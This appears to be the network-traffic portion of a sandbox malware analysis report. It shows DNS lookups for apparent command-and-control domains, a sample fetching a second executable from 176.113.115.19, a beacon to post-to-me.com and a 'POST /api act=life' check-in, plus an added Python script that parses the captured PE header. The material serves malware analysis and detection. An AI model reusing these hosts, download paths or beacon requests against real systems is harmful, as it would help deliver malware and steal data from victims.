                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.036412001 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:33.255821943 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:33.255896091 CET49739443192.168.2.11104.21.96.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:33.257431030 CET49739443192.168.2.11104.21.96.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:33.257451057 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:33.257710934 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:33.258985043 CET49739443192.168.2.11104.21.96.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:33.259000063 CET49739443192.168.2.11104.21.96.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:33.259057999 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.496900082 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.497015953 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.497070074 CET49739443192.168.2.11104.21.96.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.497196913 CET49739443192.168.2.11104.21.96.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.497220039 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.497231007 CET49739443192.168.2.11104.21.96.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.497239113 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.493549109 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.493596077 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.494050980 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.494457006 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.494467020 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.950508118 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.950634003 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.953453064 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.953475952 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.953721046 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.963565111 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.007358074 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895380974 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895407915 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895437956 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895498991 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895510912 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895545006 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895570993 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.096550941 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.096626997 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.096786022 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.096807957 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.096859932 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104120016 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104229927 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104250908 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104324102 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104378939 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104557037 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104583025 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104595900 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104595900 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104604959 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104613066 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:08.285753965 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:08.598279953 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:09.207444906 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:10.431410074 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:12.863751888 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:17.723090887 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:27.426280975 CET4971180192.168.2.11176.113.115.19
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 14, 2024 14:08:18.309937000 CET | 192.168.2.11 | 1.1.1.1 | 0x3048 | Standard query (0) | post-to-me.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:26.932851076 CET | 192.168.2.11 | 1.1.1.1 | 0x2ba4 | Standard query (0) | sordid-snaked.cyou | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:27.080741882 CET | 192.168.2.11 | 1.1.1.1 | 0x2f29 | Standard query (0) | immureprech.biz | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:31.890379906 CET | 192.168.2.11 | 1.1.1.1 | 0xebf | Standard query (0) | deafeninggeh.biz | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:35.503971100 CET | 192.168.2.11 | 1.1.1.1 | 0xfb22 | Standard query (0) | effecterectz.xyz | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:35.645792007 CET | 192.168.2.11 | 1.1.1.1 | 0x3af4 | Standard query (0) | diffuculttan.xyz | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:35.788539886 CET | 192.168.2.11 | 1.1.1.1 | 0x203c | Standard query (0) | debonairnukk.xyz | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:35.932102919 CET | 192.168.2.11 | 1.1.1.1 | 0x2853 | Standard query (0) | wrathful-jammy.cyou | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:36.072145939 CET | 192.168.2.11 | 1.1.1.1 | 0x9a5 | Standard query (0) | awake-weaves.cyou | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:36.213814020 CET | 192.168.2.11 | 1.1.1.1 | 0x7b1f | Standard query (0) | sordid-snaked.cyou | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:36.355035067 CET | 192.168.2.11 | 1.1.1.1 | 0x2f05 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 14:08:18.451951027 CET | 1.1.1.1 | 192.168.2.11 | 0x3048 | No error (0) | post-to-me.com | | 104.21.56.70 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:18.451951027 CET | 1.1.1.1 | 192.168.2.11 | 0x3048 | No error (0) | post-to-me.com | | 172.67.179.207 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:27.071722031 CET | 1.1.1.1 | 192.168.2.11 | 0x2ba4 | Name error (3) | sordid-snaked.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:27.472639084 CET | 1.1.1.1 | 192.168.2.11 | 0x2f29 | No error (0) | immureprech.biz | | 104.21.22.222 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:27.472639084 CET | 1.1.1.1 | 192.168.2.11 | 0x2f29 | No error (0) | immureprech.biz | | 172.67.207.38 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:32.035031080 CET | 1.1.1.1 | 192.168.2.11 | 0xebf | No error (0) | deafeninggeh.biz | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:32.035031080 CET | 1.1.1.1 | 192.168.2.11 | 0xebf | No error (0) | deafeninggeh.biz | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:32.035031080 CET | 1.1.1.1 | 192.168.2.11 | 0xebf | No error (0) | deafeninggeh.biz | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:32.035031080 CET | 1.1.1.1 | 192.168.2.11 | 0xebf | No error (0) | deafeninggeh.biz | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:32.035031080 CET | 1.1.1.1 | 192.168.2.11 | 0xebf | No error (0) | deafeninggeh.biz | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:32.035031080 CET | 1.1.1.1 | 192.168.2.11 | 0xebf | No error (0) | deafeninggeh.biz | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:32.035031080 CET | 1.1.1.1 | 192.168.2.11 | 0xebf | No error (0) | deafeninggeh.biz | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:35.641973972 CET | 1.1.1.1 | 192.168.2.11 | 0xfb22 | Name error (3) | effecterectz.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:35.783914089 CET | 1.1.1.1 | 192.168.2.11 | 0x3af4 | Name error (3) | diffuculttan.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:35.929006100 CET | 1.1.1.1 | 192.168.2.11 | 0x203c | Name error (3) | debonairnukk.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:36.069973946 CET | 1.1.1.1 | 192.168.2.11 | 0x2853 | Name error (3) | wrathful-jammy.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:36.210926056 CET | 1.1.1.1 | 192.168.2.11 | 0x9a5 | Name error (3) | awake-weaves.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:36.351950884 CET | 1.1.1.1 | 192.168.2.11 | 0x7b1f | Name error (3) | sordid-snaked.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:08:36.492854118 CET | 1.1.1.1 | 192.168.2.11 | 0x2f05 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
• post-to-me.com
• immureprech.biz
• deafeninggeh.biz
• steamcommunity.com
• 176.113.115.19
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49711 | 176.113.115.19 | 80 | 7736 | C:\Users\user\Desktop\XIaCqh1vRm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 14:08:20.784470081 CET | 85 | OUT | GET /ScreenUpdateSync.exe HTTP/1.1
User-Agent: ShareScreen
Host: 176.113.115.19
Dec 14, 2024 14:08:22.125427008 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 13:08:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 14 Dec 2024 13:00:02 GMT
ETag: "58600-6293a86885370"
Accept-Ranges: bytes
Content-Length: 361984
Content-Type: application/x-msdos-program
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSfRMtMMeGMs=tjZS MzRMdRMaRRichSPEL2e?\@Cl)PB0.textl `.rdataL"$@@.data=@p @.rsrc0B@@
Dec 14, 2024 14:08:22.125515938 CET | 1236 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 5c 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 51 08 00 00 6a 0c 68 50 25 44 00 e8 7b 16 00 00 8b 75 08 85 f6 74 75 83 3d
Data Ascii: %\D;@DuQjhP%D{utu=uCjkYeVYEtVPYYE}u7ujWYVj54nDDu"DPY?UQeVEPuuu9Et
Dec 14, 2024 14:08:22.125566006 CET | 448 | IN | Data Raw: 56 e8 cc 30 00 00 59 83 f8 ff 74 1b 83 f8 fe 74 16 8b d0 c1 fa 05 8b c8 83 e1 1f c1 e1 06 03 0c 95 40 a3 81 00 eb 05 b9 08 4c 44 00 f6 41 24 7f 75 29 83 f8 ff 74 19 83 f8 fe 74 14 8b c8 c1 f9 05 83 e0 1f c1 e0 06 03 04 8d 40 a3 81 00 eb 05 b8 08
Data Ascii: V0Ytt@LDA$u)tt@LD@$tWWWWW%M9}uNxAV,YEEEuV5,YUQSVW5l5h}YY;+CrwW
Dec 14, 2024 14:08:22.125576019 CET | 1236 | IN | Data Raw: e4 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 60 10 00 00 c3 e8 15 25 00 00 c3 8b ff 55 8b ec ff 75 08 e8 b7 ff ff ff f7 d8 1b c0 f7 d8 59 48 5d c3 8b ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 b1 32 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 83 3d 0c 6b
Data Ascii: EE`%UuYH]Ujju2]U=kDu)u_'h$YY]jXh%D3uEP@Dj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CSYujXY
Dec 14, 2024 14:08:22.125735044 CET | 1236 | IN | Data Raw: c0 eb 51 6a 0a e8 59 00 00 00 59 89 5d fc 39 1e 75 2c 68 a0 0f 00 00 57 e8 a2 35 00 00 59 59 85 c0 75 17 57 e8 ac f4 ff ff 59 e8 3f fe ff ff c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 91 f4 ff ff 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b
Data Ascii: QjYY]9u,hW5YYuWY?]>WYEEHj(YUEV4AD>uP"Yuj]Y6D^]U|kU+Pr;r3]UMAVuW+yiD
Dec 14, 2024 14:08:22.125742912 CET | 1236 | IN | Data Raw: c1 e7 0f 03 79 0c 68 00 80 00 00 57 ff 15 d8 10 44 00 85 c0 75 08 83 c8 ff e9 9d 00 00 00 8d 97 00 70 00 00 89 55 fc 3b fa 77 43 8b ca 2b cf c1 e9 0c 8d 47 10 41 83 48 f8 ff 83 88 ec 0f 00 00 ff 8d 90 fc 0f 00 00 89 10 8d 90 fc ef ff ff c7 40 fc
Data Ascii: yhWDupU;wC+GAH@PIuUEOHAJHAdD3GFCENCux!P_^[UMASVuW}+QiDM
Dec 14, 2024 14:08:22.125756025 CET | 1236 | IN | Data Raw: 83 c1 04 eb e7 8b 55 fc 8b ca 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f4 8b 4c 90 44 33 ff 23 ce 75 12 8b 8c 90 c4 00 00 00 23 4d f8 6a 20 5f eb 03 03 c9 47 85 c9 7d f9 8b 4d f4 8b 54 f9 04 8b 0a 2b 4d f0 8b f1 c1 fe 04 4e 83 fe 3f 89 4d f8
Data Ascii: UiDMLD3#u#Mj _G}MT+MN?M~j?^;J;Ju\ }&M|8]#\D\Du3M]!,OM|8!]u]M!K]}JzyJzyMyJzQJ
Dec 14, 2024 14:08:22.125762939 CET | 1236 | IN | Data Raw: 74 03 33 c0 c3 b8 04 04 00 00 c3 b8 12 04 00 00 c3 b8 04 08 00 00 c3 b8 11 04 00 00 c3 8b ff 56 57 8b f0 68 01 01 00 00 33 ff 8d 46 1c 57 50 e8 80 2d 00 00 33 c0 0f b7 c8 8b c1 89 7e 04 89 7e 08 89 7e 0c c1 e1 10 0b c1 8d 7e 10 ab ab ab b9 a8 42
Data Ascii: t3VWh3FWP-3~~~~BDF+@Ou@Nu_^U@D3ESWPvD3@;r t.;w+@Pj R
Dec 14, 2024 14:08:22.125875950 CET | 1236 | IN | Data Raw: 8b 43 04 e8 12 fb ff ff 89 43 0c 89 53 08 eb 03 89 73 08 33 c0 0f b7 c8 8b c1 c1 e1 10 0b c1 8d 7b 10 ab ab ab eb a8 39 35 8c 6f 44 00 0f 85 58 fe ff ff 83 c8 ff 8b 4d fc 5f 5e 33 cd 5b e8 33 e1 ff ff c9 c3 6a 14 68 58 26 44 00 e8 bb f7 ff ff 83
Data Ascii: CCSs3{95oDXM_^3[3jhX&DM}_huuE;CWh YFwh#SuYYEuvhDuFh=BDtPY^hS=DFpGD
Dec 14, 2024 14:08:22.125890017 CET | 1236 | IN | Data Raw: 8b 70 6c 85 f6 75 08 6a 20 e8 b5 07 00 00 59 8b c6 e8 67 f3 ff ff c3 6a 0c e8 21 e8 ff ff 59 83 65 fc 00 8d 46 6c 8b 3d b0 48 44 00 e8 69 ff ff ff 89 45 e4 c7 45 fc fe ff ff ff e8 02 00 00 00 eb c1 6a 0c e8 1c e7 ff ff 59 8b 75 e4 c3 8b ff 55 8b
Data Ascii: pluj Ygj!YeFl=HDiEEjYuUV5HD5Dt!HDtP5HDt'pDV$DuVYth`DPHDtuEE^]jYUV5HD5Dt!HDtP5HD
Dec 14, 2024 14:08:22.245464087 CET | 1236 | IN | Data Raw: 0d 83 3d d4 6f 44 00 00 74 04 85 c0 75 24 a1 f0 10 44 00 a3 d0 6f 44 00 a1 fc 10 44 00 c7 05 cc 6f 44 00 9f 34 40 00 89 35 d4 6f 44 00 a3 d8 6f 44 00 ff 15 f4 10 44 00 a3 c4 48 44 00 83 f8 ff 0f 84 cc 00 00 00 ff 35 d0 6f 44 00 50 ff d6 85 c0 0f
Data Ascii: =oDtu$DoDDoD4@5oDoDDHD5oDPM5oD5oDoD5oDoD5oDoDoDKteh6@5oD=YHDtHhjYYt4V5HD5oDYtj
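The 200 OK above delivers a second executable (ScreenUpdateSync.exe, Content-Type application/x-msdos-program, 361984 bytes), and the report prints its first 338 bytes as hex. The script below is an added example, not output of the report: it embeds exactly those bytes and parses the DOS header, the XOR-encoded Rich header the Microsoft linker leaves between the DOS stub and the PE signature, the COFF header and the PE32 optional header, which is as far as the truncated prefix allows (the section table would start at file offset 0x1e0). Field names follow the PE specification; the function names are this example's own.

```python
"""Parse the PE header prefix captured in the sandbox HTTP response:
DOS header -> Rich header -> COFF header -> PE32 optional header."""
import struct
from datetime import datetime, timezone

# The first 338 bytes of ScreenUpdateSync.exe, copied from the "Data Raw"
# line of the 200 OK above (everything before [TRUNCATED]).
FIRST_BYTES = bytes.fromhex("""
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa
ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa
4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa
74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa
4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa
4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa
00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00
e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01
0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00
5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00
00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00
05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00
9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00
00 00
""")

# PE32 optional header through SizeOfStackCommit (80 bytes). The data
# directories and the section table lie past the captured prefix.
OPT32 = "<HBBIIIIIIIIIHHHHHHIIIIHHII"


def parse_headers(data):
    """Return the COFF and optional-header fields a triager looks at first.
    Raises ValueError if the bytes are not the prefix of a PE32 image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing at e_lfanew")
    (machine, nsect, tstamp, _symtab, _nsyms,
     opt_size, chars) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if len(data) < opt + struct.calcsize(OPT32):
        raise ValueError("captured prefix too short for the optional header")
    f = struct.unpack_from(OPT32, data, opt)
    if f[0] != 0x10B:
        raise ValueError("not PE32 (magic 0x%x)" % f[0])
    return {
        "e_lfanew": e_lfanew, "machine": machine, "sections": nsect,
        "timestamp": tstamp,
        "built": datetime.fromtimestamp(tstamp, tz=timezone.utc).isoformat(),
        "characteristics": chars, "opt_header_size": opt_size,
        "linker": (f[1], f[2]), "size_of_code": f[3], "entry_point": f[6],
        "image_base": f[9], "section_align": f[10], "file_align": f[11],
        "size_of_image": f[19], "size_of_headers": f[20], "checksum": f[21],
        "subsystem": f[22], "dll_characteristics": f[23],
        "stack_reserve": f[24], "stack_commit": f[25],
    }


def parse_rich(data, e_lfanew):
    """Decode the Rich header: (compid, count) pairs XOR-ed with the key that
    follows the 'Rich' marker, starting after the XOR-ed 'DanS' marker."""
    end = data.rfind(b"Rich", 0, e_lfanew)
    if end < 0:
        return None
    key_bytes = data[end + 4:end + 8]
    key = struct.unpack("<I", key_bytes)[0]
    dans = bytes(b ^ k for b, k in zip(b"DanS", key_bytes))
    start = data.rfind(dans, 0, end)
    if start < 0:
        return None
    entries = []
    for off in range(start + 16, end, 8):   # skip 'DanS' + three padding dwords
        compid, count = struct.unpack_from("<II", data, off)
        compid ^= key
        entries.append((compid >> 16, compid & 0xFFFF, count ^ key))  # (prodid, build, count)
    return {"offset": start, "key": key, "entries": entries}


if __name__ == "__main__":
    hdr = parse_headers(FIRST_BYTES)
    for k, v in hdr.items():
        print("%-20s %s" % (k, hex(v) if isinstance(v, int) else v))
    rich = parse_rich(FIRST_BYTES, hdr["e_lfanew"])
    print("rich key 0x%08x, (prodid, build, count):" % rich["key"], rich["entries"])
```

What the prefix already tells you: the image is 32-bit x86 with a 4-section layout (the Data Ascii line shows .text, .rdata, .data and .rsrc), SizeOfImage is 0x431000 (about 4.4 MB) against 361984 bytes on the wire, so most of the mapped image is zero-filled at load, which is where an unpacking stub usually writes its output; the section table that would confirm this lies past the captured bytes. TimeDateStamp 0x6532dee7 decodes to 2023-10-20, while the server's Last-Modified is 14 Dec 2024 13:00:02 GMT, eight minutes before the sandbox fetched the file, so the build stamp is either an old build or a forged one and should not be used to date the campaign. The Rich header's repeated build 21022 agrees with MajorLinkerVersion 9, the Visual Studio 2008 toolset, and the prodid 1 entry's count (115) is the number of imported functions.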


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49710 | 104.21.56.70 | 443 | 7736 | C:\Users\user\Desktop\XIaCqh1vRm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:08:19 UTC | 90 | OUT | GET /track_prt.php?sub=0&cc=DE HTTP/1.1
User-Agent: ShareScreen
Host: post-to-me.com
2024-12-14 13:08:20 UTC | 806 | IN | HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 13:08:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.4.16
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=keWj8a1QU%2BK9%2FrGMk4HqHVA3PmoEdMg4KpJ4pqAqmRWuP1wrAZFb1zuEF8Q%2FQ784wuMw0d%2F%2BKz0Gkl3DWci%2Ft0VnsxhL4TPAGcKS4U32tZCEuPZig3YBrS47BDlSdiVd7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f1e6c08cfa38cdd-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1963&rtt_var=743&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1467336&cwnd=161&unsent_bytes=0&cid=a388979225d3d464&ts=637&x=0"
2024-12-14 13:08:20 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
                                                                                                                                                                                                                                                                        2024-12-14 13:08:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49727 | 104.21.22.22 | 443 | 7976 | C:\Users\user\AppData\Local\Temp\3247.tmp.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:08:28 UTC | 262 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: immureprech.biz
2024-12-14 13:08:28 UTC | 8 bytes | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-14 13:08:31 UTC | 1018 bytes | IN | HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 13:08:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hbs1ol8sm9g15i0c5dtraoivm4; expires=Wed, 09-Apr-2025 06:55:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VN%2FJ16V2%2F5E3u0j%2FEFiK3Wl6idFgod5kNTbMb3gX4i8hNU5ZAiWsGBjg8jUPIA8qzMrSOhzhRsBuHrrtfDCco5TtlvEwFkeN6NSIuUEJ1zASURPPMgOSBr%2Bx%2FJK6pLZER%2FM%3D"}],"group":"cf-nel","max_age":604800}
